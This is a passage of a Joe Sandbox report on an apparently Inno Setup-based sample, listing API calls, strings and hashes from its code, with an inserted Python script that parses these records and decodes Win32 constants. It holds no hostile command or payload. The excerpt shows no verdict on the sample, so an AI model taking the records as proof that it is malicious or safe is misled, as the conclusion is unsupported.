                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                • String ID: CreateEvent$TransactNamedPipe
                                                                                • API String ID: 2182916169-3012584893
                                                                                • Opcode ID: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                                                • Opcode Fuzzy Hash: 1e3f92d8c22a05294e06b5c780760953f793dd62cf34ae2b617d69319ed8131f
                                                                                • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                                                • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                                                • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                                  • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                • API String ID: 1914119943-2711329623
                                                                                • Opcode ID: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                • Instruction ID: a27b950e9f8baa5d3fd7d83d3f5f0f06fd95d714c0010da27a3b0cf72a10e13f
                                                                                • Opcode Fuzzy Hash: 1f12b3bfc7457beb1676229d9a9ac5705a2be6c49cf36285249ab65db7443b7f
                                                                                • Instruction Fuzzy Hash: AB319471B00604AFDB12EFAACC41D5BB7BDEB897557528466FC04D7252DA38DD04CB28
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                • LocalFree.KERNEL32(006D3F78,00000000,00401B68), ref: 00401ACF
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,006D3F78,00000000,00401B68), ref: 00401AEE
                                                                                • LocalFree.KERNEL32(006D4F78,?,00000000,00008000,006D3F78,00000000,00401B68), ref: 00401B2D
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID: LUm$x?m$xOm
                                                                                • API String ID: 3782394904-1117891313
                                                                                • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                APIs
                                                                                • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                • SaveDC.GDI32(?), ref: 00416E37
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                • DeleteObject.GDI32(?), ref: 00416F32
                                                                                • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                • String ID:
                                                                                • API String ID: 375863564-0
                                                                                • Opcode ID: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                • Instruction ID: 305d9ddf0f7240c011be45b7bb8b7ddc49b42f68556790db257713301bb8c367
                                                                                • Opcode Fuzzy Hash: e9e72d8966bdaf80817d84d11445bcfe7b70581a29c6dab9ad28bd9778771da1
                                                                                • Instruction Fuzzy Hash: FC514C712086445FDB54EF69C8C0B9777E8AF48314F15466AFD488B287C738EC85CB99
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                                • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                                • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
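Each bullet in these records is one call: API name, exporting module, the dwords the plugin captured on the stack at the call site (which run past the real parameter count, so trailing values are residue from earlier pushes), and the address of the call. The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses bullets in that format, pairs the GetModuleHandleA/GetProcAddress sequence of the 0042F1A4 record earlier in this section into resolved imports, and names the CreateFileA and GetStdHandle constants of the record just above. The two sample records are copied verbatim from this page; the class, function and regex names are this example's own, and folding 000000F5 back to STD_OUTPUT_HANDLE (-11) is this example's reading of how the plugin prints a byte-sized push immediate, not something the report states.

```python
"""Parse the API-call bullets of a Joe Sandbox function record (added example, not
Joe Sandbox code). Sample records are copied from this page; Win32 constant
tables are the documented values; names and regexes are this example's own."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple, Union

Arg = Union[int, str, None]

# "Name.MODULE(a,b), ref: 0042F1C5" or "Name.MODULE ref: 0042F1A4", optionally
# prefixed "Part of subcall function XXXXXXXX: " for bullets describing a callee.
_BULLET = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
_HEX = re.compile(r"^-?[0-9A-F]{8}$")  # one stack dword; negatives carry a leading '-'

# Constructed samples: bullets of the 0042F1A4 and 00404B46 records on this page, verbatim.
SAMPLE_USER32 = """\
• GetActiveWindow.USER32 ref: 0042F1A4
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
• GetWindowRect.USER32(?,00000000), ref: 0042F21E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
"""
SAMPLE_FILE = """\
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
"""

@dataclass
class Call:
    api: str
    module: str
    args: List[Arg]   # stack dwords as printed; they run past the real parameter count
    ref: int          # address of the call instruction
    subcall_of: Optional[int] = None

def parse_arg(tok: str) -> Arg:
    """'?' is unresolved, 8 hex digits (optionally signed) are a dword, else a string."""
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16) if _HEX.match(tok) else tok

def parse_record(text: str) -> List[Call]:
    """Calls of one record in listing order; header lines such as 'APIs' are skipped."""
    calls = []
    for m in filter(None, map(_BULLET.match, text.splitlines())):
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls

def dynamic_imports(calls: List[Call]) -> List[Tuple[Optional[str], Optional[str]]]:
    """Pair each GetProcAddress with the last DLL name given to GetModuleHandle/LoadLibrary.
    Only the documented slot is trusted: a DLL name in the lpProcName slot (the OLEAUT32
    record on this page, whose real name UnRegisterTypeLib sits one slot later in the
    GetModuleHandleA bullet) is reported as an unresolved name (None)."""
    pairs, module = [], None
    for c in calls:
        if c.api.startswith(("GetModuleHandle", "LoadLibrary")) and c.args and isinstance(c.args[0], str):
            module = c.args[0]
        elif c.api == "GetProcAddress" and len(c.args) > 1 and isinstance(c.args[1], str):
            pairs.append((module, None if c.args[1].lower().endswith(".dll") else c.args[1]))
    return pairs

_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
_SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
_STD = {-10: "STD_INPUT_HANDLE", -11: "STD_OUTPUT_HANDLE", -12: "STD_ERROR_HANDLE"}

def _flags(value: Optional[int], table: dict) -> List[str]:
    return [name for bit, name in table.items() if value is not None and value & bit]

def decode_create_file(c: Call) -> dict:
    """Name the constants of a CreateFileA/W call; only the first seven slots are parameters."""
    if c.api not in ("CreateFileA", "CreateFileW"):
        raise ValueError(c.api)
    name, access, share, _sa, disp, flags, _tmpl = (c.args + [None] * 7)[:7]
    return {"file": name, "access": _flags(access, _ACCESS),
            "share": _flags(share, _SHARE) or ["no sharing"],
            "disposition": _DISPOSITION.get(disp, disp), "flags": flags}

def std_handle_name(value: int) -> Optional[str]:
    """GetStdHandle accepts only -10/-11/-12. The listing prints 'push -11' as 000000F5
    (the byte encoding, not sign-extended), so fold byte- or dword-sized values back to
    signed before the lookup. That folding is this example's reading, not the report's."""
    if 0x80 <= value <= 0xFF:
        value -= 0x100
    elif value >= 0x80000000:
        value -= 0x100000000
    return _STD.get(value)

if __name__ == "__main__":
    for module, proc in dynamic_imports(parse_record(SAMPLE_USER32)):
        print(f"resolved {proc} from {module}")
    f = parse_record(SAMPLE_FILE)
    print(decode_create_file(f[0]), "seek:", f[1].args[1])
    print("GetStdHandle ->", std_handle_name(f[-1].args[0]))
```

Run against the record above, decode_create_file reports GENERIC_READ, FILE_SHARE_WRITE, OPEN_EXISTING and FILE_ATTRIBUTE_NORMAL (0x80), and the SetFilePointer bullet parses to a signed -0x80 offset, which is what the "-00000080" notation in these listings means. Strings that happen to be exactly eight hex characters would be misread as dwords by parse_arg; none occur on this page.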
                                                                                APIs
                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 004222A2
                                                                                • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 004222AF
                                                                                • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222CD
                                                                                • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222E9
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Delete$EnableItem$System
                                                                                • String ID:
                                                                                • API String ID: 3985193851-0
                                                                                • Opcode ID: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                • Instruction ID: b791af981bedf3385b2dd143af085cc0c004e448fbd85fce69a0ff0a91ac5271
                                                                                • Opcode Fuzzy Hash: 510ebc35eb44907ae1e975f945bfd8864758d272309f2385250dfef8029dc5ab
                                                                                • Instruction Fuzzy Hash: 35213370340744BAE720D725DD8BF9B7BD89B04718F4440A5BA487F2D7C7F9AA80869C
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(10000000), ref: 00481499
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004814AD
                                                                                • SendNotifyMessageA.USER32(000203BE,00000496,00002710,00000000), ref: 0048151F
                                                                                Strings
                                                                                • Not restarting Windows because Setup is being run from the debugger., xrefs: 004814CE
                                                                                • Restarting Windows., xrefs: 004814FA
                                                                                • DeinitializeSetup, xrefs: 00481395
                                                                                • Deinitializing Setup., xrefs: 004812FA
                                                                                • GetCustomSetupExitCode, xrefs: 00481339
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: FreeLibrary$MessageNotifySend
                                                                                • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                • API String ID: 3817813901-1884538726
                                                                                • Opcode ID: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                • Instruction ID: fb8259b883485ef9100c7f5c1e95e74d54582b152ce66d5af1bc00326fba4159
                                                                                • Opcode Fuzzy Hash: cfffdee43b38d7813a81b11c3b84a740b2c32b2c8dbaa0def3367d9992a49e61
                                                                                • Instruction Fuzzy Hash: 4451A034704240AFD711EB69D895B2E7BE9FB59704F50887BE801C72B1DB38A846CB5D
                                                                                APIs
                                                                                • SHGetMalloc.SHELL32(?), ref: 00461A33
                                                                                • GetActiveWindow.USER32 ref: 00461A97
                                                                                • CoInitialize.OLE32(00000000), ref: 00461AAB
                                                                                • SHBrowseForFolder.SHELL32(?), ref: 00461AC2
                                                                                • CoUninitialize.OLE32(00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AD7
                                                                                • SetActiveWindow.USER32(?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AED
                                                                                • SetActiveWindow.USER32(?,?,00461B03,00000000,?,?,?,?,?,00000000,00461B87), ref: 00461AF6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                • String ID: A
                                                                                • API String ID: 2684663990-3554254475
                                                                                • Opcode ID: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                • Instruction ID: 1302daae15839a874164301860301a8b98b45f7dd6f96d3c0913b4bd506695dd
                                                                                • Opcode Fuzzy Hash: 6bf2c69099c90f86a267e24c634b690acb1506b8ce1301c413aa044d63ad6a36
                                                                                • Instruction Fuzzy Hash: 64314FB0E00248AFDB00EFE6D885A9EBBF8EB09304F51447AF404E7251E7785A44CF59
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85,?,?,00000000,004731F4), ref: 00472C8C
                                                                                  • Part of subcall function 0042CDA4: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE1A
                                                                                  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049B628,004980C1,00000000,00498116,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000,?,00472F85), ref: 00472D03
                                                                                • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472D29,?,?,?,00000008,00000000,00000000,00000000), ref: 00472D09
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                • API String ID: 884541143-1710247218
                                                                                • Opcode ID: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                • Instruction ID: a2498b92200520dbea2b626460b71344a260e4c3afc9e0684e621ff8b49742b9
                                                                                • Opcode Fuzzy Hash: e52ff7fc8aad4532f2121d8bd5e8e7392c558ff45c5d59df65582d72ab666be0
                                                                                • Instruction Fuzzy Hash: 731122303005087BD721EA66DD82B9E73ACCB88714F60853BB404B72D1CB7CEE02865C
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D621
                                                                                • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D631
                                                                                • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D641
                                                                                • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D651
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                • API String ID: 190572456-3516654456
                                                                                • Opcode ID: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                • Instruction ID: 6d5035e3426567f523c7c0f539c0fc89aa7e9857b83a97dd2a4ec5b9764e3533
                                                                                • Opcode Fuzzy Hash: fd665f86a4c397101f291ae51b8d6e2550680f8309e6d6ef8ebab45c29bb7339
                                                                                • Instruction Fuzzy Hash: 0D01ECB0900740DEEB24DFB6ACC572236A5ABA470AF14C13B980DD62A2D779044ADF2C
                                                                                APIs
                                                                                • SetBkColor.GDI32(?,00000000), ref: 0041A9C9
                                                                                • 73EA4D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041AA03
                                                                                • SetBkColor.GDI32(?,?), ref: 0041AA18
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA62
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AA6D
                                                                                • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA7D
                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AABC
                                                                                • SetTextColor.GDI32(00000000,00000000), ref: 0041AAC6
                                                                                • SetBkColor.GDI32(00000000,?), ref: 0041AAD3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Color$StretchText
                                                                                • String ID:
                                                                                • API String ID: 2984075790-0
                                                                                • Opcode ID: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                • Instruction ID: 0e7efefeb240adcf91359f1fba61dc18d1efd34d50a4dd97ee32c9a960060edb
                                                                                • Opcode Fuzzy Hash: 318b750f44eee03e3b20258c50c4ae641761c2031fb7fe23ccccef054dc028d8
                                                                                • Instruction Fuzzy Hash: 9861C5B5A00105EFCB40EFADD985E9AB7F8AF08314B10856AF918DB261C735ED41CF68
                                                                                APIs
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,004580B4,?, /s ",?,regsvr32.exe",?,004580B4), ref: 00458026
                                                                                Strings
                                                                                Memory Dump Source
